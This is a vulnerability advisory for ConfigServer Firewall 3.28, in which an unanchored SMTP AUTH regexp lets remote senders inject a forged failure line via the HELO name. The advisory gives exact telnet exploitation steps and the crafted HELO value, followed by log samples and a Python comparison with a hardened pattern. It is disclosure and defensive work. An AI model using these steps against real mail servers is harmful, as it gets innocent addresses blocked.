CSF 3.28 - remotely block any IP address (smtpauth regexp)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block SMTP AUTH based brute-force login attempts by matching lines in /var/log/exim_mainlog. A regexp in csf/regexp.pm allowed any remote, unauthenticated person to block any IP address of their choice. The code looked similar to the following:

    # Unanchored: "fixed_login" and the bracketed IP may appear anywhere in the
    # line, so $1 can be taken from client-controlled text such as the HELO name.
    if ( $log_line =~ /fixed_login.*\[(\d+\.\d+\.\d+\.\d+)]: 535 Incorrect authentication data/ ) {
        return ( 'Unsuccessful SMTP AUTH login from', $1, 'smtpauth' );
    }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.


The following steps can be used to take advantage of this issue:


1. telnet $victim_mailserver 25

2. Issue the following two commands:

helo fixed_login [1.2.3.4]: 535 Incorrect authentication data
mail from:<>

3. Issue the following command 5 times:

rcpt to:<user@example.com>



This is what a normal SMTP authentication failure in exim_mainlog looks like:

2009-09-08 17:16:37 H=host.example.com [1.1.1.1] F=<> rejected RCPT <user@example.com>: host.example.com [1.1.1.1]
is currently not permitted to relay through this server. Perhaps you have not logged into the pop/imap server in the last
30 minutes or do not have SMTP Authentication turned on in your email client.


and this is what the log looks like each time the command from step 3 above is issued:

2009-09-08 17:09:26 H=host.example.com (fixed_login [1.2.3.4]: 535 Incorrect authentication data) [1.1.1.1]
F=<> rejected RCPT <user@example.com>: host.example.com (fixed_login [1.2.3.4]: 535 Incorrect authentication data)
[1.1.1.1] is currently not permitted to relay through this server. Perhaps you have not logged into the pop/imap
server in the last 30 minutes or do not have SMTP Authentication turned on in your email client.


The text inside the parentheses, "fixed_login [1.2.3.4]: 535 Incorrect authentication data" (shown in bold in the original advisory), is what has been remotely injected into the log: it is the HELO argument from step 2, which Exim writes verbatim after the host name. The unanchored regexp matches it and hands 1.2.3.4 to CSF for blocking, rather than the real connecting address 1.1.1.1.
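The two log lines above, run through the vulnerable pattern and through a hardened one, as an added Python example (this is not CSF's code and not the fix CSF later shipped). The regexp is ported verbatim from regexp.pm; the syntax used is the same in Perl and Python's re module. The injected line and the relay rejection are the ones quoted above with the wrapped output joined; the genuine auth-failure line and the "double" line are constructed for this example and assume Exim's standard wording "<authenticator> authenticator failed for <host> [<ip>]: 535 Incorrect authentication data (set_id=<user>)".

```python
import re

# CSF 3.28 pattern as quoted in the advisory, ported verbatim to Python's re
# module (this regex syntax is identical in Perl and Python).
VULNERABLE = re.compile(
    r'fixed_login.*\[(\d+\.\d+\.\d+\.\d+)]: 535 Incorrect authentication data'
)

# Hardened matcher written for this example (assumption: it is NOT the fix
# CSF shipped). It assumes Exim's standard auth-failure wording:
#   <date> <time> <authenticator> authenticator failed for <host> (<helo>) [<ip>]:
#   535 Incorrect authentication data (set_id=<user>)
# Defences against the HELO trick:
#   * anchored at the start of the line: the timestamp and the literal
#     "authenticator failed for" phrase must come first, and a HELO string
#     cannot place itself there;
#   * anchored at the end of the line: the captured [ip] must be the one that
#     is followed only by the 535 text (and an optional set_id), i.e. the
#     address Exim writes AFTER any client-supplied HELO text.
HARDENED = re.compile(
    r'^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+ authenticator failed for .*'
    r'\[(\d+\.\d+\.\d+\.\d+)\]: 535 Incorrect authentication data'
    r'(?: \(set_id=[^()]*\))?$'
)


def extract_ip(pattern, log_line):
    """Return the address the pattern would hand to CSF for blocking, or None."""
    m = pattern.search(log_line)
    return m.group(1) if m else None


def compare(lines):
    """Run both patterns over each (label, line) pair; returns a list of
    (label, ip_from_vulnerable, ip_from_hardened) tuples."""
    return [(label, extract_ip(VULNERABLE, line), extract_ip(HARDENED, line))
            for label, line in lines]


# Sample lines. INJECTED and RELAY_REJECT are the advisory's lines with the
# wrapped output joined; GENUINE and DOUBLE are constructed for this example.
GENUINE = (
    "2009-09-08 17:16:37 fixed_login authenticator failed for host.example.com "
    "[1.1.1.1]: 535 Incorrect authentication data (set_id=alice)"
)
RELAY_REJECT = (
    "2009-09-08 17:16:37 H=host.example.com [1.1.1.1] F=<> rejected RCPT "
    "<user@example.com>: host.example.com [1.1.1.1] is currently not permitted "
    "to relay through this server."
)
INJECTED = (
    "2009-09-08 17:09:26 H=host.example.com (fixed_login [1.2.3.4]: 535 Incorrect "
    "authentication data) [1.1.1.1] F=<> rejected RCPT <user@example.com>: "
    "host.example.com (fixed_login [1.2.3.4]: 535 Incorrect authentication data) "
    "[1.1.1.1] is currently not permitted to relay through this server."
)
# A real AUTH failure from a client whose HELO also carries the fake field.
DOUBLE = (
    "2009-09-08 17:20:00 fixed_login authenticator failed for host.example.com "
    "(fixed_login [1.2.3.4]: 535 Incorrect authentication data) "
    "[1.1.1.1]: 535 Incorrect authentication data (set_id=alice)"
)

SAMPLES = [("genuine", GENUINE), ("relay_reject", RELAY_REJECT),
           ("injected", INJECTED), ("double", DOUBLE)]

if __name__ == "__main__":
    for label, vuln_ip, hard_ip in compare(SAMPLES):
        print(f"{label:13s} vulnerable -> {vuln_ip!s:8s} hardened -> {hard_ip}")
```

Running it shows the vulnerable pattern returning 1.2.3.4 for the injected relay rejection (an address that never connected), while the hardened pattern returns None for it and still returns 1.1.1.1 for the genuine failure and for the "double" line. The design point is that the connecting address occupies a fixed position that Exim writes after the client-controlled HELO text, so anchoring both ends of the line and taking the rightmost bracketed field makes HELO content unable to shift which field is captured. Restricting set_id to text without parentheses means a failure line whose username contains a parenthesis simply does not match, which fails safe (no block) rather than blocking a forged address.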